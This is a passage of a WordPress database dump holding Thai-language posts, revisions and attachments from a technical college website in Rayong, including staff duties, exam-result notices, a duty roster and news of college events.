(3525, 3, '2018-07-24 11:07:34', '2018-07-24 04:07:34', '<img class=\"size-full wp-image-1652 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" /><img class=\"wp-image-1650 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\n\n<img class=\"wp-image-1755 size-full aligncenter\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\n\n<a href=\"http://incubator.technicrayong.ac.th/portal.php\"><img class=\"aligncenter wp-image-3523 size-full\" src=\"/wp-content/uploads/2018/07/24-7-2561-9-59-35.jpg\" alt=\"\" width=\"983\" height=\"244\" /></a>\n\n<a href=\"https://www.facebook.com/incubator.rtc?fref=pb&hc_location=profile_browser\"><img class=\"alignleft wp-image-3443\" src=\"/wp-content/uploads/2018/07/12-7-2561-16-11-06.jpg\" alt=\"\" width=\"78\" height=\"93\" /></a>\n\n \n\n \n\n \n\n \n\n<img class=\"size-full wp-image-2971 alignleft\" src=\"/wp-content/uploads/2018/06/Trade_01.png\" alt=\"\" width=\"251\" height=\"48\" />\n\n \n\n \n\nงานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ มีหน้าที่และความรับผิดชอบดังต่อไปนี้\n<ul>\n <li style=\"list-style-type: none;\">\n<ul>\n <li>ส่งเสริมให้ครู นักเรียน นักศึกษา และบุคลากรในสถานศึกษาดำเนินงาน ส่งเสริมผลิตผล จัดทำแผนธุรกิจร่วมกับหน่วยงานภาครัฐและเอกชน ส่งเสริมการทำธุรกิจขนาดย่อม การประกอบอาชีพอิสระเพื่อสร้างรายได้ให้สอดคล้องกับการเรียนการสอน</li>\n <li>วางแผน ดำเนินงาน ประสานสัมพันธ์ ร่วมมือกับบุคคล ชุมชน องค์กร ชุมชน องค์กรเอกชน องค์กรวิชาชีพ สถานประกอบการ หน่วยงานของรัฐ และรัฐวิสาหกิจ เพื่อรับงานการค้า รับจัดทำ รับบริการ รับจ้าง ผลิตเพื่อจำหน่าย การหารายได้ระหว่างเรียนการประกอบธุรกิจ และกิจกรรมสหกรณ์</li>\n <li>สอบผลิตผลทุกประเภทของสถานศึกษาให้ตรงกับโครงการฝึก จัดทำทะเบียนผลิตผล และจำหน่ายผลิตผล</li>\n <li>กำกับ ติดตาม และจัดทำบัญชีรายรับ–รายจ่ายของงานผลิตผล การค้า และธุรกิจ ที่อยู่ในความรับผิดชอบให้เป็นปัจจุบัน และจัดทำรายงานเป็นประจำทุกเดือน</li>\n <li>รวบรวมข้อมูล สถิติต่าง ๆ รายรับ–รายจ่ายในการดำเนินงาน เพื่อเป็นข้อมูลในการพิจารณาปรับปรุงแก้ไขพัฒนางาน ให้เกิดประโยชน์ต่อสถานศึกษา</li>\n <li>ประสานงานและให้ความร่วมมือกับหน่วยงานต่าง ๆ ทั้งภายในและภายนอกสถานศึกษา</li>\n <li>จัดทำปฏิทินการปฏิบัติงาน เสนอโครงการและรายงานการปฏิบัติงานตามลำดับขั้น</li>\n <li>ดูแล บำรุงรักษาและรับผิดชอบทรัพย์สินของสถานศึกษาที่ได้รับมอบหมาย</li>\n <li>ปฏิบัติงานอื่นตามที่ได้รับมอบหมาย</li>\n</ul>\n</li>\n</ul>\n \n\n<img class=\"wp-image-2972 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/Natee-karnka-1.png\" alt=\"\" width=\"670\" height=\"2212\" />\n\n.\n\n ', 'งานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ', '', 'inherit', 'closed', 'closed', '', '1757-autosave-v1', '', '', '2018-07-24 11:07:34', '2018-07-24 04:07:34', '', 1757, 'http://www.technicrayong.ac.th/1757-autosave-v1/', 0, 'revision', '', 0),
(3526, 3, '2018-07-24 11:06:56', '2018-07-24 04:06:56', '<img class=\"size-full wp-image-1652 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" /><img class=\"wp-image-1650 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"wp-image-1755 size-full aligncenter\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n<a href=\"http://incubator.technicrayong.ac.th/portal.php\"><img class=\"aligncenter wp-image-3523 size-full\" src=\"/wp-content/uploads/2018/07/24-7-2561-9-59-35.jpg\" alt=\"\" width=\"983\" height=\"244\" /></a>\r\n\r\n<a href=\"https://www.facebook.com/incubator.rtc?fref=pb&hc_location=profile_browser\"><img class=\"alignleft wp-image-3443\" src=\"/wp-content/uploads/2018/07/12-7-2561-16-11-06.jpg\" alt=\"\" width=\"78\" height=\"93\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"size-full wp-image-2971 alignleft\" src=\"/wp-content/uploads/2018/06/Trade_01.png\" alt=\"\" width=\"251\" height=\"48\" />\r\n\r\n \r\n\r\n \r\n\r\nงานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ มีหน้าที่และความรับผิดชอบดังต่อไปนี้\r\n<ul>\r\n <li style=\"list-style-type: none;\">\r\n<ul>\r\n <li>ส่งเสริมให้ครู นักเรียน นักศึกษา และบุคลากรในสถานศึกษาดำเนินงาน ส่งเสริมผลิตผล จัดทำแผนธุรกิจร่วมกับหน่วยงานภาครัฐและเอกชน ส่งเสริมการทำธุรกิจขนาดย่อม การประกอบอาชีพอิสระเพื่อสร้างรายได้ให้สอดคล้องกับการเรียนการสอน</li>\r\n <li>วางแผน ดำเนินงาน ประสานสัมพันธ์ ร่วมมือกับบุคคล ชุมชน องค์กร ชุมชน องค์กรเอกชน องค์กรวิชาชีพ สถานประกอบการ หน่วยงานของรัฐ และรัฐวิสาหกิจ เพื่อรับงานการค้า รับจัดทำ รับบริการ รับจ้าง ผลิตเพื่อจำหน่าย การหารายได้ระหว่างเรียนการประกอบธุรกิจ และกิจกรรมสหกรณ์</li>\r\n <li>สอบผลิตผลทุกประเภทของสถานศึกษาให้ตรงกับโครงการฝึก จัดทำทะเบียนผลิตผล และจำหน่ายผลิตผล</li>\r\n <li>กำกับ ติดตาม และจัดทำบัญชีรายรับ–รายจ่ายของงานผลิตผล การค้า และธุรกิจ ที่อยู่ในความรับผิดชอบให้เป็นปัจจุบัน และจัดทำรายงานเป็นประจำทุกเดือน</li>\r\n <li>รวบรวมข้อมูล สถิติต่าง ๆ รายรับ–รายจ่ายในการดำเนินงาน เพื่อเป็นข้อมูลในการพิจารณาปรับปรุงแก้ไขพัฒนางาน ให้เกิดประโยชน์ต่อสถานศึกษา</li>\r\n <li>ประสานงานและให้ความร่วมมือกับหน่วยงานต่าง ๆ ทั้งภายในและภายนอกสถานศึกษา</li>\r\n <li>จัดทำปฏิทินการปฏิบัติงาน เสนอโครงการและรายงานการปฏิบัติงานตามลำดับขั้น</li>\r\n <li>ดูแล บำรุงรักษาและรับผิดชอบทรัพย์สินของสถานศึกษาที่ได้รับมอบหมาย</li>\r\n <li>ปฏิบัติงานอื่นตามที่ได้รับมอบหมาย</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n<img class=\"wp-image-2972 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/Natee-karnka-1.png\" alt=\"\" width=\"670\" height=\"2212\" />\r\n\r\n.\r\n\r\n ', 'งานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ', '', 'inherit', 'closed', 'closed', '', '1757-revision-v1', '', '', '2018-07-24 11:06:56', '2018-07-24 04:06:56', '', 1757, 'http://www.technicrayong.ac.th/1757-revision-v1/', 0, 'revision', '', 0),
(3528, 3, '2018-07-26 11:13:52', '2018-07-26 04:13:52', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 4 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad-5', '', '', '2018-07-26 11:13:52', '2018-07-26 04:13:52', '', 0, 'http://www.technicrayong.ac.th/?p=3528', 362, 'post', '', 0),
(3529, 3, '2018-07-26 11:13:37', '2018-07-26 04:13:37', '', 'ประกาศผลสอบ ครูอัตราจ้าง 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%ad%e0%b8%9a-%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2', '', '', '2018-07-26 11:13:37', '2018-07-26 04:13:37', '', 3528, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/ประกาศผลสอบ-ครูอัตราจ้าง-4-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(3530, 3, '2018-07-26 11:13:52', '2018-07-26 04:13:52', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '3528-revision-v1', '', '', '2018-07-26 11:13:52', '2018-07-26 04:13:52', '', 3528, 'http://www.technicrayong.ac.th/3528-revision-v1/', 0, 'revision', '', 0),
(3531, 3, '2018-07-26 11:14:04', '2018-07-26 04:14:04', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '3528-autosave-v1', '', '', '2018-07-26 11:14:04', '2018-07-26 04:14:04', '', 3528, 'http://www.technicrayong.ac.th/3528-autosave-v1/', 0, 'revision', '', 0),
(3533, 3, '2018-08-01 14:07:37', '2018-08-01 07:07:37', '', '1-8-2561 14-08-54', '', 'inherit', 'closed', 'closed', '', '1-8-2561-14-08-54', '', '', '2018-08-01 14:07:37', '2018-08-01 07:07:37', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/1-8-2561-14-08-54.jpg', 0, 'attachment', 'image/jpeg', 0),
(3535, 3, '2018-08-01 14:15:27', '2018-08-01 07:15:27', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F08%2F%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%AA%E0%B8%B4%E0%B8%87%E0%B8%AB%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนสิงหาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%aa%e0%b8%b4%e0%b8%87%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-2561', '', '', '2018-08-01 14:15:27', '2018-08-01 07:15:27', '', 0, 'http://www.technicrayong.ac.th/?p=3535', 361, 'post', '', 0),
(3537, 3, '2018-08-01 14:15:27', '2018-08-01 07:15:27', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F08%2F%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%AA%E0%B8%B4%E0%B8%87%E0%B8%AB%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนสิงหาคม 2561', '', 'inherit', 'closed', 'closed', '', '3535-revision-v1', '', '', '2018-08-01 14:15:27', '2018-08-01 07:15:27', '', 3535, 'http://www.technicrayong.ac.th/3535-revision-v1/', 0, 'revision', '', 0),
(3538, 3, '2018-08-01 14:15:37', '2018-08-01 07:15:37', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F08%2F%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%AA%E0%B8%B4%E0%B8%87%E0%B8%AB%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนสิงหาคม 2561', '', 'inherit', 'closed', 'closed', '', '3535-autosave-v1', '', '', '2018-08-01 14:15:37', '2018-08-01 07:15:37', '', 3535, 'http://www.technicrayong.ac.th/3535-autosave-v1/', 0, 'revision', '', 0),
(3540, 3, '2018-08-03 10:01:22', '2018-08-03 03:01:22', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.627316597644532&type=3\"><img class=\"aligncenter wp-image-3541 size-full\" src=\"/wp-content/uploads/2018/08/3-8-2561-10-02-58.jpg\" alt=\"\" width=\"520\" height=\"653\" /></a>', 'โครงการอบรมหลักสูตร \"เปิดสำรับอาหารถิ่นเชฟชุมชนชวนกินถิ่นระยอง รุ่นที่ 3\" โดย เชฟชุมพล แจ้งไพร ผู้อำนวยการโรงเรียนสอนทำอาหารไทย MSC และคณะครูจากแผนกวิชาอาหารและโภชนาการ จากวิทยาลัยเทคนิคระยอง ระหว่างวันที่ 14-15 กรกฎาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b8%b9%e0%b8%95%e0%b8%a3%e2%80%8b-%e0%b9%80', '', '', '2018-08-03 10:03:29', '2018-08-03 03:03:29', '', 0, 'http://www.technicrayong.ac.th/?p=3540', 360, 'post', '', 0),
(3541, 3, '2018-08-03 10:00:46', '2018-08-03 03:00:46', '', '3-8-2561 10-02-58', '', 'inherit', 'closed', 'closed', '', '3-8-2561-10-02-58', '', '', '2018-08-03 10:00:46', '2018-08-03 03:00:46', '', 3540, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/3-8-2561-10-02-58.jpg', 0, 'attachment', 'image/jpeg', 0),
(3542, 3, '2018-08-03 10:01:22', '2018-08-03 03:01:22', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.627316597644532&type=3\"><img class=\"aligncenter wp-image-3541 size-full\" src=\"/wp-content/uploads/2018/08/3-8-2561-10-02-58.jpg\" alt=\"\" width=\"520\" height=\"653\" /></a>', 'โครงการอบรมหลักสูตร \"เปิดสำรับอาหารถิ่นเชฟชุมชนชวนกินถิ่นระยอง รุ่นที่ 3\" โดย เชฟชุมพล แจ้งไพร ผู้อำนวยการโรงเรียนสอนทำอาหารไทย MSC และคณะครูจากแผนกวิชาอาหารและโภชนาการ จากวิทยาลัยเทคนิคระยอง ระหว่างวันที่ 14-15 กรกฎาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3540-revision-v1', '', '', '2018-08-03 10:01:22', '2018-08-03 03:01:22', '', 3540, 'http://www.technicrayong.ac.th/3540-revision-v1/', 0, 'revision', '', 0),
(3543, 3, '2018-08-03 10:03:40', '2018-08-03 03:03:40', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.627316597644532&type=3\"><img class=\"aligncenter wp-image-3541 size-full\" src=\"/wp-content/uploads/2018/08/3-8-2561-10-02-58.jpg\" alt=\"\" width=\"520\" height=\"653\" /></a>', 'โครงการอบรมหลักสูตร \"เปิดสำรับอาหารถิ่นเชฟชุมชนชวนกินถิ่นระยอง รุ่นที่ 3\" โดย เชฟชุมพล แจ้งไพร ผู้อำนวยการโรงเรียนสอนทำอาหารไทย MSC และคณะครูจากแผนกวิชาอาหารและโภชนาการ จากวิทยาลัยเทคนิคระยอง ระหว่างวันที่ 14-15 กรกฎาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3540-autosave-v1', '', '', '2018-08-03 10:03:40', '2018-08-03 03:03:40', '', 3540, 'http://www.technicrayong.ac.th/3540-autosave-v1/', 0, 'revision', '', 0),
(3544, 3, '2018-08-03 10:03:15', '2018-08-03 03:03:15', '', '37155728_627314850978040_7913403781759369216_o', '', 'inherit', 'closed', 'closed', '', '37155728_627314850978040_7913403781759369216_o', '', '', '2018-08-03 10:03:15', '2018-08-03 03:03:15', '', 3540, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/37155728_627314850978040_7913403781759369216_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3545, 3, '2018-08-03 10:09:28', '2018-08-03 03:09:28', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D629166164126242%26id%3D100010985913485&width=500\" width=\"500\" height=\"797\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เตรียมความพร้อมจัดการเรียนการสอนอาชีวศึกษาภาคภาษาอังกฤษ (Mini English Program) โดยจัดหาครูต่างประเทศที่มีความรู้ความสามารถสอนได้ทั้งวิชาพื้นฐานและวิชาชีพ ซึ่งเกิดจากความร่วมมือกับ Bulacan State University ในการส่งบุคลากร มาสอนให้กับนักศึกษาวิทยาลัยฯ ในวันพุธที่ 18 กรกฎาคม 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%80%e0%b8%95%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%a1%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%9e%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80', '', '', '2018-08-03 10:09:28', '2018-08-03 03:09:28', '', 0, 'http://www.technicrayong.ac.th/?p=3545', 359, 'post', '', 0),
(3546, 3, '2018-08-03 10:09:02', '2018-08-03 03:09:02', '', '37277238_629158637460328_4448582376208990208_o', '', 'inherit', 'closed', 'closed', '', '37277238_629158637460328_4448582376208990208_o', '', '', '2018-08-03 10:09:02', '2018-08-03 03:09:02', '', 3545, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/37277238_629158637460328_4448582376208990208_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3547, 3, '2018-08-03 10:09:28', '2018-08-03 03:09:28', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D629166164126242%26id%3D100010985913485&width=500\" width=\"500\" height=\"797\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เตรียมความพร้อมจัดการเรียนการสอนอาชีวศึกษาภาคภาษาอังกฤษ (Mini English Program) โดยจัดหาครูต่างประเทศที่มีความรู้ความสามารถสอนได้ทั้งวิชาพื้นฐานและวิชาชีพ ซึ่งเกิดจากความร่วมมือกับ Bulacan State University ในการส่งบุคลากร มาสอนให้กับนักศึกษาวิทยาลัยฯ ในวันพุธที่ 18 กรกฎาคม 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3545-revision-v1', '', '', '2018-08-03 10:09:28', '2018-08-03 03:09:28', '', 3545, 'http://www.technicrayong.ac.th/3545-revision-v1/', 0, 'revision', '', 0),
(3548, 3, '2018-08-03 10:09:39', '2018-08-03 03:09:39', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D629166164126242%26id%3D100010985913485&width=500\" width=\"500\" height=\"797\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เตรียมความพร้อมจัดการเรียนการสอนอาชีวศึกษาภาคภาษาอังกฤษ (Mini English Program) โดยจัดหาครูต่างประเทศที่มีความรู้ความสามารถสอนได้ทั้งวิชาพื้นฐานและวิชาชีพ ซึ่งเกิดจากความร่วมมือกับ Bulacan State University ในการส่งบุคลากร มาสอนให้กับนักศึกษาวิทยาลัยฯ ในวันพุธที่ 18 กรกฎาคม 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3545-autosave-v1', '', '', '2018-08-03 10:09:39', '2018-08-03 03:09:39', '', 3545, 'http://www.technicrayong.ac.th/3545-autosave-v1/', 0, 'revision', '', 0),
(3549, 3, '2018-08-03 10:18:42', '2018-08-03 03:18:42', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D635097520199773%26id%3D100010985913485&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักเรียน นักศึกษา สาขาวิชาคหกรรมศาสตร์ วิทยาลัยเทคนิคระยอง คว้ารางวัลจากการประกวดโครงการสืบสานศาสตร์ศิลป์ ส่งเสริมสยาม สู่ความยั่งยืน กิจกรรม \" สืบสานศาสตร์ศิลป์ การประกวดเย็บร้อย ค่อยจีบ ประดิษฐ์งานใบตอง ระดับชาติ ครั้งที่ 9 จากการประกวดวิจิตรตะการกรองร้อยพานเครื่องนมัสการทองน้อย ระหว่างวันที่ 16-18 กรกฏาคม 2561 ที่ผ่านมา ณ หอประชุมใหญ่มหาวิทยาลัยสวนดุสิต วิทยาเขตสุพรรณบุรี จังหวัดสุพรรณบุรี', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2-%e0%b8%aa%e0%b8%b2%e0%b8%82%e0%b8%b2%e0%b8%a7%e0%b8%b4', '', '', '2018-08-03 10:18:42', '2018-08-03 03:18:42', '', 0, 'http://www.technicrayong.ac.th/?p=3549', 358, 'post', '', 0),
(3550, 3, '2018-08-03 10:18:16', '2018-08-03 03:18:16', '', '37697567_635083873534471_1418842338859417600_o', '', 'inherit', 'closed', 'closed', '', '37697567_635083873534471_1418842338859417600_o', '', '', '2018-08-03 10:18:16', '2018-08-03 03:18:16', '', 3549, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/37697567_635083873534471_1418842338859417600_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3551, 3, '2018-08-03 10:18:42', '2018-08-03 03:18:42', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D635097520199773%26id%3D100010985913485&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักเรียน นักศึกษา สาขาวิชาคหกรรมศาสตร์ วิทยาลัยเทคนิคระยอง คว้ารางวัลจากการประกวดโครงการสืบสานศาสตร์ศิลป์ ส่งเสริมสยาม สู่ความยั่งยืน กิจกรรม \" สืบสานศาสตร์ศิลป์ การประกวดเย็บร้อย ค่อยจีบ ประดิษฐ์งานใบตอง ระดับชาติ ครั้งที่ 9 จากการประกวดวิจิตรตะการกรองร้อยพานเครื่องนมัสการทองน้อย ระหว่างวันที่ 16-18 กรกฏาคม 2561 ที่ผ่านมา ณ หอประชุมใหญ่มหาวิทยาลัยสวนดุสิต วิทยาเขตสุพรรณบุรี จังหวัดสุพรรณบุรี', '', 'inherit', 'closed', 'closed', '', '3549-revision-v1', '', '', '2018-08-03 10:18:42', '2018-08-03 03:18:42', '', 3549, 'http://www.technicrayong.ac.th/3549-revision-v1/', 0, 'revision', '', 0),
(3552, 3, '2018-08-03 10:18:53', '2018-08-03 03:18:53', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D635097520199773%26id%3D100010985913485&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักเรียน นักศึกษา สาขาวิชาคหกรรมศาสตร์ วิทยาลัยเทคนิคระยอง คว้ารางวัลจากการประกวดโครงการสืบสานศาสตร์ศิลป์ ส่งเสริมสยาม สู่ความยั่งยืน กิจกรรม \" สืบสานศาสตร์ศิลป์ การประกวดเย็บร้อย ค่อยจีบ ประดิษฐ์งานใบตอง ระดับชาติ ครั้งที่ 9 จากการประกวดวิจิตรตะการกรองร้อยพานเครื่องนมัสการทองน้อย ระหว่างวันที่ 16-18 กรกฏาคม 2561 ที่ผ่านมา ณ หอประชุมใหญ่มหาวิทยาลัยสวนดุสิต วิทยาเขตสุพรรณบุรี จังหวัดสุพรรณบุรี', '', 'inherit', 'closed', 'closed', '', '3549-autosave-v1', '', '', '2018-08-03 10:18:53', '2018-08-03 03:18:53', '', 3549, 'http://www.technicrayong.ac.th/3549-autosave-v1/', 0, 'revision', '', 0),
(3553, 3, '2018-08-03 10:24:02', '2018-08-03 03:24:02', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.635344246841767%26type%3D3&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 24 กรกฎาคม 2561 วิทยาลัยเทคนิคระยอง เข้ารับการตรวจประเมินศูนย์ซ่อมสร้างเพื่อชุมชน (Fix it Center) แบบถาวรประจำจังหวัด ประจำปีการศึกษา 2560 ให้เป็นไปตามระเบียบสำนักงานคณะกรรมการการอาชีวศึกษา และแนวปฏิบัติประกอบระเบียบฯ ว่าด้วยศูนย์ซ่อมสร้างเพื่อชุมชน พร้อมเยี่ยมชมศูนย์ ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', 